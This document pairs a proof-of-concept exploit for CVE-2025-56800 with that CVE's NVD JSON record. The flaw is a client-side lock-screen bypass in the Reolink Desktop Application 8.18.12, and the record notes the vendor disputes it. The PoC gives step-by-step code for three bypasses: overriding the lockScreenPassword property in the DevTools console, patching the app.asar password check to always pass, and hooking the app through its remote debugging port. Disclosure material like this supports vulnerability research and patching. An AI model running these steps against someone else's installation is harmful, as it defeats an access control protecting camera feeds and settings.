CVE-2025-56800

/* CVE-2025-56800 - Reolink Desktop Application Lock Screen Bypass PoC * Vulnerability: Client-side authentication bypass via modifiable JavaScript property * Target: Reolink Desktop Application 8.18.12 (Electron-based) */ // Method 1: Modify the lockScreenPassword property directly via DevTools Console // Open DevTools (Ctrl+Shift+I or via menu) and execute in the Console tab: // Step 1: Locate the settingsManager object const settingsManager = a.settingsManager; // Step 2: Override the lockScreenPassword property to a known value Object.defineProperty(settingsManager, 'lockScreenPassword', { value: 'bypass_password', writable: true, configurable: true }); // Step 3: Alternatively, override the getter to always return a known password Object.defineProperty(settingsManager, 'lockScreenPassword', { get: function() { return 'bypass_password'; }, set: function() {}, configurable: true }); // Step 4: Enter 'bypass_password' in the lock screen to bypass authentication // Method 2: Patch the asar archive directly // Extract the asar file: // npx asar extract app.asar ./app_extracted // // Modify the JavaScript file containing the password comparison logic: // Find: if (inputPassword === a.settingsManager.lockScreenPassword) { ... } // Replace with: if (true) { ... } // // Repackage the asar file: // npx asar pack ./app_extracted ./app_modified.asar // Replace the original app.asar with the modified version and restart the application. // Method 3: Runtime hook using Electron debugging port // Launch the application with remote debugging enabled: // ./Reolink --remote-debugging-port=9222 // // Connect via Chrome DevTools at chrome://inspect and execute the property override as shown in Method 1.

{"cve": {"id": "CVE-2025-56800", "sourceIdentifier": "[email protected]", "published": "2025-10-21T19:21:22.780", "lastModified": "2025-11-17T12:46:26.313", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "Reolink desktop application 8.18.12 contains a vulnerability in its local authentication mechanism. The application implements lock screen password logic entirely on the client side using JavaScript within an Electron resource file. Because the password is stored and returned via a modifiable JavaScript property(a.settingsManager.lockScreenPassword), an attacker can patch the return value to bypass authentication. NOTE: this is disputed by the Supplier because the lock-screen bypass would only occur if the local user modified his own instance of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:*", "matchCriteriaId": "30EFCAEB-546D-449F-A08D-360DFF9CE745"}]}]}], "references": [{"url": "https://github.com/shinyColumn/CVE-2025-56800", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://shinycolumn.notion.site/reolink-auth-bypass", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}